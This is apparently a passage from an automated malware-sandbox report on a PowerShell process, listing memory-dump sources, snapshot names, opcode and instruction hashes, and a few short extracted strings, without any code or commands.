795->798 806 7cc1a20 800->806 807 7cc1a22-7cc1a2e 800->807 808 7cc1a3a-7cc1a41 801->808 806->801 807->801 811 7cc1a48-7cc1aa5 808->811 812 7cc1a43-7cc1a46 808->812 813 7cc1aaa-7cc1ab1 811->813 812->813
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b496fabcf7aef4318831afcb5bbf3fa0eeac911416c1c2bf67854a3c088ca4fa
                                • Instruction ID: b7ca9c3183e15b4f6d8c898f99936abce77dd3d1ea902f79d27ac6fafbf2486a
                                • Opcode Fuzzy Hash: b496fabcf7aef4318831afcb5bbf3fa0eeac911416c1c2bf67854a3c088ca4fa
                                • Instruction Fuzzy Hash: 01B149F170420A9FCB14DB6EC4406AABBE6AF86211F1CC0BFD445DB252DB31D941CBA2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06eab3dd9bf3e2f3da8a4b9dd39fc668b8f525995bc79b402c8028d46876f87e
                                • Instruction ID: a45a6bcac7a5edd52361a6ae08483562fbd8d6d0221c48132439164a7cdb37b9
                                • Opcode Fuzzy Hash: 06eab3dd9bf3e2f3da8a4b9dd39fc668b8f525995bc79b402c8028d46876f87e
                                • Instruction Fuzzy Hash: D6916874A002099FCB15CF58C5D49AAFBB1FF88310B24869AD955AB365C735FC91CFA0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 45d4dd4e41b8317d9875b1001ae801f0d1429de1111f361c29c2548b3d80b4e7
                                • Instruction ID: c1e6255d209c6fac91160b32a838965a6d595199dc0d74a8978661f82f0a7eb1
                                • Opcode Fuzzy Hash: 45d4dd4e41b8317d9875b1001ae801f0d1429de1111f361c29c2548b3d80b4e7
                                • Instruction Fuzzy Hash: CA51F3757042158FD704DB79E844A6ABBEAFFC8315F1544AAD809CB362EB35EC01CBA0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7106d198b29959555312294975372b0e7206864c9e97b25305e0daf6d92687c1
                                • Instruction ID: 2ff06a8d21a248cee0920816d4f59cae941b197377add2327be442be3563554b
                                • Opcode Fuzzy Hash: 7106d198b29959555312294975372b0e7206864c9e97b25305e0daf6d92687c1
                                • Instruction Fuzzy Hash: 62610971E002089FCB14DFA9D58469DBBF5FF88314F14816AE819AB364EB74AC45CB64
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef332e5562d2a484d3c059a4301b5826dd5a96789b2b7abb06282a8af9c6dce3
                                • Instruction ID: b3adf461ea6066c2769c14549ddda79d45b10f1a07e48f9aee38a685243f1164
                                • Opcode Fuzzy Hash: ef332e5562d2a484d3c059a4301b5826dd5a96789b2b7abb06282a8af9c6dce3
                                • Instruction Fuzzy Hash: A8511A75E01248DFCB54CFA9D584A9DFBF5FF88310F14806AE819AB364EB34A845CB64
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c425c625515e9169d35e2a15fa8da0c16d4f76aba627d2c2e1805f7c262e0ec0
                                • Instruction ID: 664c12df7852a4db7c359d14a663489b622ddd91bfd7799e5269b03a66d89d62
                                • Opcode Fuzzy Hash: c425c625515e9169d35e2a15fa8da0c16d4f76aba627d2c2e1805f7c262e0ec0
                                • Instruction Fuzzy Hash: 63519E34B002058FCB10DF6CD59492EBBE6EF8831471585A9E949CF375EB30ED068B91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 16099adeb1b52a0c591f91f465d8bd0d129c1a43026c86159f3d446a64c4dade
                                • Instruction ID: bfb30920a4f6848c17fa42a09d20a25d89989830839d33deb80d3bc214fdc0d5
                                • Opcode Fuzzy Hash: 16099adeb1b52a0c591f91f465d8bd0d129c1a43026c86159f3d446a64c4dade
                                • Instruction Fuzzy Hash: FC414B34B002058FCB10DF6CD69596ABBE6EFC830871584A9E909DF365EB34ED068B91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad3759b269625683d2a51cd2a74fc73e5315311bd7eb42a7d3b889b335ced839
                                • Instruction ID: 726c6f46a2a6130f65b049057f76cbfe76bee786bb110f8bcadef7ac747fcabb
                                • Opcode Fuzzy Hash: ad3759b269625683d2a51cd2a74fc73e5315311bd7eb42a7d3b889b335ced839
                                • Instruction Fuzzy Hash: 5E412678A005059FCB09CF58C5989EAFBB1FF48314B218599D915AB365C732FC91CFA0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cde26335389b551c8b235de6346fa26b8ff44b0d93bc38d94151a1b9c8933172
                                • Instruction ID: c130c97e7a2d81d79eeb2d72fea2378c6a8f12f2a756c2f8a5bf7a2b985bafb6
                                • Opcode Fuzzy Hash: cde26335389b551c8b235de6346fa26b8ff44b0d93bc38d94151a1b9c8933172
                                • Instruction Fuzzy Hash: D64105F0B20242CFCB24DB25D581AAA7BB29B85648F14C4ADD900AF295D731DE45CBE7
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e120bb0d8089228f2a805c53eb32626d26ebf5760911d046ebcb571d6c2c7bd
                                • Instruction ID: ec5b601aa02a53389ecc0832c2376140ed6fbdde22786af6d509ceaa10d756b4
                                • Opcode Fuzzy Hash: 0e120bb0d8089228f2a805c53eb32626d26ebf5760911d046ebcb571d6c2c7bd
                                • Instruction Fuzzy Hash: 8A317C353003019FD709EB68E854F9AB7AAEFC4215F108539D609CB365EF74AC09CBA1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bbc5b4f587c044a53ccf28846846f43db15dd7c406942419f8cc46920cf2865f
                                • Instruction ID: e1df60e63202649c6fcaecf467206652d865c26f900ad4c98b701074fe8c5966
                                • Opcode Fuzzy Hash: bbc5b4f587c044a53ccf28846846f43db15dd7c406942419f8cc46920cf2865f
                                • Instruction Fuzzy Hash: 02313C35B002158FCB14CFA5D558AAEBBF2EF8D315F1450A9E806AB3A1DB35EC11CB60
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17405f2e55c815f75cef92c21d547fd0be2dd1dcf2fcee40eb10c35a5b4e3c77
                                • Instruction ID: 3893d37fe6ff5f8e85a1f4e5b07021ec0924584c00239e7820d70239b8875562
                                • Opcode Fuzzy Hash: 17405f2e55c815f75cef92c21d547fd0be2dd1dcf2fcee40eb10c35a5b4e3c77
                                • Instruction Fuzzy Hash: E7317070E012099FDB04DFA9D494AAEBBF6EF88304F14902DE805EB364EB349C418B65
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f4cb296213db6792849031562a1844dfa1fe91dc7267d488d57a35cf2dc5480
                                • Instruction ID: 87adad54c1f47e8899e67c27062bd919eab2aa966a1cb6cf6ba2506e22294bbd
                                • Opcode Fuzzy Hash: 4f4cb296213db6792849031562a1844dfa1fe91dc7267d488d57a35cf2dc5480
                                • Instruction Fuzzy Hash: 88314C34A002158FCB14DF69E458A9EBBF6FF8D714F14856AD806EB3A0DB71AC45CB90
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 987cf09a2d05f5caebceaf73ade800d6f2f76974ed1789d185a1aaa3bde45e07
                                • Instruction ID: 0a758b88c778c23649a963413d32c742f514da793bdc02e9cddff45ca00640fc
                                • Opcode Fuzzy Hash: 987cf09a2d05f5caebceaf73ade800d6f2f76974ed1789d185a1aaa3bde45e07
                                • Instruction Fuzzy Hash: 01316174E002099FDB04DFA9D5947AEBBF6EF88304F109039E905EB364EB349C418B65
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1711c75ac7eb77357ce75a5589325ae31a2cb89e816794cfe0040d647b998cce
                                • Instruction ID: 4b806054c5e24d06511186d9c43b4c8c3bf219f23b7af8e807f27a1d36fa1bc2
                                • Opcode Fuzzy Hash: 1711c75ac7eb77357ce75a5589325ae31a2cb89e816794cfe0040d647b998cce
                                • Instruction Fuzzy Hash: D731A4B8A002099FEB04EF74D494AAEBBB6EF84300F21847DC155AB394DA38DD41CF65
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6873a2938bd17bc410e2782a5b974c3bb648d964e5bd2a11754150c033d5108d
                                • Instruction ID: 1f0b92e459d68db892171fc8227c097b5a0bf570df96227eb4d4112324609351
                                • Opcode Fuzzy Hash: 6873a2938bd17bc410e2782a5b974c3bb648d964e5bd2a11754150c033d5108d
                                • Instruction Fuzzy Hash: 62312B34A002158FCB14DF69E458A9EBBF6FF88314F14952ED406EB3A0DB74AC45CB94
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42da60964f313f185504325421b3223f65e450868a4df5b49ea007209d5b5801
                                • Instruction ID: 712d28b5bd7e5ff13f639bd253eb92d53ce0c190b74f1c13a20130c970dfe6fd
                                • Opcode Fuzzy Hash: 42da60964f313f185504325421b3223f65e450868a4df5b49ea007209d5b5801
                                • Instruction Fuzzy Hash: 51219C743003009FDB15DF69D980D5ABBE9EF8A214710C9AAE449CF365DB35EC05CBA5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40420e59b6df68cad936657c635de9dd4ed65961caab8dc27d31b2c5e5d40385
                                • Instruction ID: 9dc86de117be7c16826c30e5066d175bb58cdf56bb6e5952a47739677a27c702
                                • Opcode Fuzzy Hash: 40420e59b6df68cad936657c635de9dd4ed65961caab8dc27d31b2c5e5d40385
                                • Instruction Fuzzy Hash: FA3164B8A002099FEB04EF64D854ABE7BB6EF84700F218479D515AB394DB35DD01CF65
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131077697.000000000369D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0369D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_369d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 70d7f3bc0d504fdbd4b03e6bf0c80e61a64aa3bdf36524294cda8f8cdbac1c3f
                                • Instruction ID: eebd305228610980054ebd36c92b39c6fb780be6b0ce3ba2d326e9311e9f86e6
                                • Opcode Fuzzy Hash: 70d7f3bc0d504fdbd4b03e6bf0c80e61a64aa3bdf36524294cda8f8cdbac1c3f
                                • Instruction Fuzzy Hash: B921B171504200DFEF05CF54DA80B26BB69EB88715F24C5AAE9098E357C73AD456CBB1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2524c313e729d4da92642d606696eb2d8176554ee2c8bad196cb951854266df4
                                • Instruction ID: 18f87dd1b692c5b27178d3cb2a8f5a5ee1dc7c1c3d22e993c665cef0243ca10a
                                • Opcode Fuzzy Hash: 2524c313e729d4da92642d606696eb2d8176554ee2c8bad196cb951854266df4
                                • Instruction Fuzzy Hash: 93D05E52B011254B5A5432AE18006BBA5DEDBC54A9B9520B69F05D3262EC44EC2A03F2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                • Instruction ID: c07ad3fa0ad2d4489fdecb34aa37d1b9a74b375ca222e4a4504fc840219e799a
                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                • Instruction Fuzzy Hash: D7E08631B0001497CB089559D8108DDF7AADBCC220F04C07ADD0AA7350DE32691586E1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9bdf4e67da762cace18cf9da3e08bf2dd127d6ba3353607547de5f083a1eb77d
                                • Instruction ID: 13825b51fcd16cf058695c42d977555c5be31a001314c4737f2f79802e36d04b
                                • Opcode Fuzzy Hash: 9bdf4e67da762cace18cf9da3e08bf2dd127d6ba3353607547de5f083a1eb77d
                                • Instruction Fuzzy Hash: C7E0C236340714178616A61EAC10C9FBBDEDFC5671311803EE40ECB310DE64EC058BE5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8edb67002d799b8bf6c3848bb54f90dea98abf127ef4cab02af39f7602ae0d7d
                                • Instruction ID: 0cfcebc8201d39d75b3014908247523b5610847cae43da01779d385826f19b0d
                                • Opcode Fuzzy Hash: 8edb67002d799b8bf6c3848bb54f90dea98abf127ef4cab02af39f7602ae0d7d
                                • Instruction Fuzzy Hash: ACE04F30845209CFCB09EFA4E81A4EEBB30FF16301B4041EDE956872A1EB31265ACBC0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3db91a4529258567650b32386371258d4dd94a0854ccb81ff9d812c3e4b92b57
                                • Instruction ID: ebc004407878d857f87bbeb925fda748652f83d05c37ad886cc8cb34738b6347
                                • Opcode Fuzzy Hash: 3db91a4529258567650b32386371258d4dd94a0854ccb81ff9d812c3e4b92b57
                                • Instruction Fuzzy Hash: 5FE0E570E056458FCB45EFB884521AABFE0AF49210B6485AEC94ADA601E7314612CB92
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f622c0bb97fa4aa1c3d364f8f186d8b03b46f36a6ebc7de87058257616e03cec
                                • Instruction ID: 8679d43aed9520c50ecfffde6e9131618a1a6b23d705e8c4ce713ea61c8c953c
                                • Opcode Fuzzy Hash: f622c0bb97fa4aa1c3d364f8f186d8b03b46f36a6ebc7de87058257616e03cec
                                • Instruction Fuzzy Hash: B2E04F36A0924BCFCB44EF64D0955EEBFB0FF0A305B0084A9ED8597355EB316850DB81
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                • Instruction ID: 73c6c26a664d1a7698c376fb48a8711d4225d6e74d1af24e60bb35b48c77e359
                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                • Instruction Fuzzy Hash: E6D06270D042099F8780EFADC94156DFBF4EB48200F5085AA8919E7311F7315612DBD1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 576e237fa799e056ea0d953cf0991ffd08f170e450a1a23f883c926318c07a27
                                • Instruction ID: 219d7ec8f0c8367be6be579e928c2d4df91183b321c5da899c909b67f3807065
                                • Opcode Fuzzy Hash: 576e237fa799e056ea0d953cf0991ffd08f170e450a1a23f883c926318c07a27
                                • Instruction Fuzzy Hash: 5CD06731905209CBCB08ABA5E85A4FDBB74FB14301F40416DE92792191EB313A5ACAC5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53f6d6e5562d6c366206fc920279b4d9061c6f641ef52594ce80120bdf704fc0
                                • Instruction ID: 6def1e588d0d3c15d1335d38c7f43cfdc22fc990c9a4e4bb6c07967da9f4a7cb
                                • Opcode Fuzzy Hash: 53f6d6e5562d6c366206fc920279b4d9061c6f641ef52594ce80120bdf704fc0
                                • Instruction Fuzzy Hash: 8BD01735A0830A8BCB08EFA4E4468AEBBB4EB45201F008169ED4993350EB307811CBC1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c0b6c05fd69052a1b87dd2706bc6096336830c6d4377bdcb9effd4f165b2286
                                • Instruction ID: a78c0686d6cc454c854287e336cc78782a9cfdd7fef7b1ea46cddbd9aa3aee94
                                • Opcode Fuzzy Hash: 1c0b6c05fd69052a1b87dd2706bc6096336830c6d4377bdcb9effd4f165b2286
                                • Instruction Fuzzy Hash: C3D0A771009344CFC7061B3498181443B24DB53206B5604CDD8494B2A38515A84A8721
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 907bf64e2c5dd051e21adc43736f7ee983e869ac02e2c796d472841c30162197
                                • Instruction ID: 1825f77b31c5870f37e850b4bd68266b827f2851c842eefda4edb6e94dee58e7
                                • Opcode Fuzzy Hash: 907bf64e2c5dd051e21adc43736f7ee983e869ac02e2c796d472841c30162197
                                • Instruction Fuzzy Hash: 05C09BD3A2D3C14FEF0292314C6535DBF71556355574F55C2D891EB3A2D9248805C762
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98ddc0ee10999a26ae71a252676f936b909547fdc1d33360ca995336a92f5109
                                • Instruction ID: a2eb27e9f84e6ec5f57aeac10ba9ea8bd5ddb2cf0c72a905801850bb5de8955f
                                • Opcode Fuzzy Hash: 98ddc0ee10999a26ae71a252676f936b909547fdc1d33360ca995336a92f5109
                                • Instruction Fuzzy Hash: 8DB092300457089FC2487F79A4089147329EB4521978004ECE90E0A2928F36E889CA45
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$`Q]q$`Q]q$tP]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-810355167
                                • Opcode ID: 5953f0a1a9fd97b4a3dddd76e49976a0dec7c7594c5686ebb1845b8aa06d1cfe
                                • Instruction ID: e13310297db92eae814f02cbc9793353e8c179279d8bba748b738a7fa092f634
                                • Opcode Fuzzy Hash: 5953f0a1a9fd97b4a3dddd76e49976a0dec7c7594c5686ebb1845b8aa06d1cfe
                                • Instruction Fuzzy Hash: 2D6180F061424EDFEB24CE4BC584BAA77F2BB45355F2C8059E8019B292C735DE81CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-1910532044
                                • Opcode ID: ac34ebe27cf1d08ca9714f1149f7620364fe329b1ac6667476ad8bdec51eff15
                                • Instruction ID: bfe4220e539dfa485e1a3c018c73565a24aadad04a52e622d09a97f170f3a010
                                • Opcode Fuzzy Hash: ac34ebe27cf1d08ca9714f1149f7620364fe329b1ac6667476ad8bdec51eff15
                                • Instruction Fuzzy Hash: 8BA198B13043858FC725DB79A85476ABFE6EFC6610F18C4AFD845DB291CA31C941C7A2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q$pij$tP]q$tP]q
                                • API String ID: 0-532307603
                                • Opcode ID: aae0093201574b322a6df92dde8a5cf8b85ad08a050b1716c92977c8dc1cad81
                                • Instruction ID: 4d7766178a2b7b1e5904ed7d61d3bfeba0c9e5168bf31e5300eb6843aea6b055
                                • Opcode Fuzzy Hash: aae0093201574b322a6df92dde8a5cf8b85ad08a050b1716c92977c8dc1cad81
                                • Instruction Fuzzy Hash: 70D138F1B0430A8FC725DB6E944466ABBFAAF82310F18C4AFD945CB256DB31C945C7A1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$4']q$4']q$4']q$4']q
                                • API String ID: 0-2283484764
                                • Opcode ID: 3c14d4b21514d7b37a542e01cf5533fae2b6f7df445d857917614fde07017a98
                                • Instruction ID: b84d059472eba8a4bd16c2cbf39e1b5117eedf7cb3a32ae140065d63d782c40b
                                • Opcode Fuzzy Hash: 3c14d4b21514d7b37a542e01cf5533fae2b6f7df445d857917614fde07017a98
                                • Instruction Fuzzy Hash: B5D125B0704355CFC715DB6898517AABBA2AFC2210F14C4BFE545CB292CB358D86CBE2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                • API String ID: 0-2353078639
                                • Opcode ID: 660c95e552b84e6cb5e7bde60b175c036befa134379865b2975ec4433a4e94da
                                • Instruction ID: 6f3ad1f6668f4a5ec5a7f83c544463fafa7438aa50ff6e8dfa276a1549cc99dd
                                • Opcode Fuzzy Hash: 660c95e552b84e6cb5e7bde60b175c036befa134379865b2975ec4433a4e94da
                                • Instruction Fuzzy Hash: 2D5188F17043868FCB25DA29AA4166ABBA6AFC2210F24C46FD445CB251DB35C945CBA3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 22e9efcfc201ca510467cc12c5a0b16d517ac9191216e245d05ea263027c2a89
